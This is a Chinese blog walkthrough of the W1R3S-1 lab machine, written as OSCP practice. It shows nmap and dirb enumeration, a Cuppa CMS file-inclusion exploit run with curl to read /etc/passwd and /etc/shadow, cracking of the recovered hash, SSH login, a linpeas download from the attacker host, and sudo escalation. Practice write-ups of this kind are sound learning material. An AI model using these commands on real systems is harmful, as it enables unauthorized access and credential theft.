【oscp系列-W1R3S-1】靶机5

5、项目五:W1R3S-1

1)信息收集

1、nmap挖掘信息

img

nmap -sC -sV -p- -O 192.168.64.178

img

开放端口:21、22、80、3306

frp测试登录:anonymous anonymous

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-9Z71KYh0-1673875302376)(C:\Users\ADMINI~1\AppData\Local\Temp\ksohtml7796\wps98.jpg)]

ls下面发现三个文件

img

get 到本地发现打开没有有用信息

2、页面爆破

登录页面没有消息

img

直接爆破页面

dirb http://192.168.64.178

查找出该页面存在administrator目录:

img

80web端口访问: http://192.168.64.178/administrator/installation/

img

发现是Title[Cuppa CMS]框架!CuppaCMS是一套内容管理系统(CMS)!

3、Cuppa CMS LFI****利用

谷歌搜索:Cuppa CMS exploit

https://www.exploit-db.com/exploits/25971

该漏洞发现为文件包含漏洞:利用如下

img

利用文件漏洞攻击

http://192.168.64.178/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

img

这里post请求看不到目录

改为在kali上get请求查看目录,–data-urlencode:

在新版本的CURL中,提供了新的选项 --data-urlencode,通过该选项提供的参数会自动转义特殊字符。

Post请求

curl --data-urlencode urlConfig=…/…/…/…/…/…/…/…/…/etc/passwd
http://192.168.64.178/administrator/alerts/alertConfigField.php

curl -s --data-urlencode
urlConfig=…/…/…/…/…/…/…/…/…/etc/shadow
http://192.168.64.178/administrator/alerts/alertConfigField.php

Shadow下发现一个密匙

img

img

保存密匙用来破解

w1r3s: 6 6 6xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::

爆破获得密码

img

img

但是提示已经破解过,需要john --show password.txt 查看已经爆破过的

img

computer     (w1r3s)

ssh w1r3s@102.168.64.178

利用密码进行ssh登录

img

2)提权

确保kali有linpeas这个组件

上传组件linpeas从本地kali到靶机上,

这里一定注意:ip地址是kali,传输协议是http,别打错

wget http://192.168.64.165:8081/linpeas.sh

img

./使用linpeas开始扫描本地网站信息

img

跑出很多信息,这里不一一列举,包括密匙、sudo,这里直接利用sudo

img

img

sudo提权,这里发现sudo下的信息提示all权限、且文件全是r,所以直接用

img

img

sudu 后密码是computer

总结:

这里产生文件上传漏洞的关键是include_once,查看源码

img
sudu 后密码是computer

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值